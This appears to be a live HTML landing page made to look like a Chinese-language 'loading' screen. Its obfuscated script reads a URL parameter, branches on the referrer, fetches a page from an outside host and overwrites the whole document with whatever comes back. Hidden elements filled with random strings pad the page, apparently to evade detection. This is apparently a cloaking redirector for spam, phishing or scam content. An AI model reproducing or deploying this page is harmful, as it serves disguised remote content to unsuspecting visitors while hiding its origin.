<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .xnyEVuQ2f9b {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .xnyEVuQ2f9b .es6gcrR9 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .xnyEVuQ2f9b .content {
            line-height: 50px;
            text-align: center
        }

        .xnyEVuQ2f9b .img {
            width: 100%
        }

        .xnyEVuQ2f9b .sr5K3E9dv {
            text-align: center
        }

        .xnyEVuQ2f9b .sr5K3E9dv span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .xnyEVuQ2f9b .sr5K3E9dv span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .xnyEVuQ2f9b .sr5K3E9dv span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .xnyEVuQ2f9b .sr5K3E9dv span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .xnyEVuQ2f9b .sr5K3E9dv span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .xnyEVuQ2f9b .sr5K3E9dv span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .xnyEVuQ2f9b .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function dYRHT0s5oGTMF(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ApseltB = dYRHT0s5oGTMF('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ApseltB +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ApseltB +".html?a=share";
		}
		
        I0fSBaB=url+"#"+new Date().getTime();
        I0fSBaB && function() {
            $.get(I0fSBaB, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>BegcRaTHAnLhkQ8FpVVCuuc4nHQ9JgbuvRwcVe26qUlMDPyUaVMlzRSCGGzgXbRlmEPF4uXtyIuFNmyMVFroEoqDqXMbkt0TgB8c</a>
<a  href='#' style='display:none'>BegcRaTHAnLhkQ8FpVVCuuc4nHQ9JgbuvRwcVe26qUlMDPyUaVMlzRSCGGzgXbRlmEPF4uXtyIuFNmyMVFroEoqDqXMbkt0TgB8c</a>
<p  style='display:none'>NvRl6Cg45mprXGUqQWrt5o07lWjZKz81JJXG9mnJf5pWaNduby7qba86Jh</p>
<a  href='#' style='display:none'>BegcRaTHAnLhkQ8FpVVCuuc4nHQ9JgbuvRwcVe26qUlMDPyUaVMlzRSCGGzgXbRlmEPF4uXtyIuFNmyMVFroEoqDqXMbkt0TgB8c</a>
<a  href='#' style='display:none'>BegcRaTHAnLhkQ8FpVVCuuc4nHQ9JgbuvRwcVe26qUlMDPyUaVMlzRSCGGzgXbRlmEPF4uXtyIuFNmyMVFroEoqDqXMbkt0TgB8c</a><div class="xnyEVuQ2f9b">
    <div class="es6gcrR9">
        <div class="sr5K3E9dv">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>cj5Wz4Ua18KlNY6nxvBpFyALf1lYNJtVQPrORBu7Re4edNu6PMeaqPzdSU0ay3gKJNrn6uCex</div>
<img  src='' style='display:none'>
<span style='display:none'>nemwHP1xIJoNDAwaaHMftmZz8CsMIOLFIwvdlLO8gi7DQmyBrvgd1TWvaqtv5BfruRoC7KkE19CUV</span>
<li style='display:none' >nBjUTHwH0WjZ5fXey03Vqku2D9JID7EXakpO7b0gUKAKiETDQ9cb</li></body>
</html>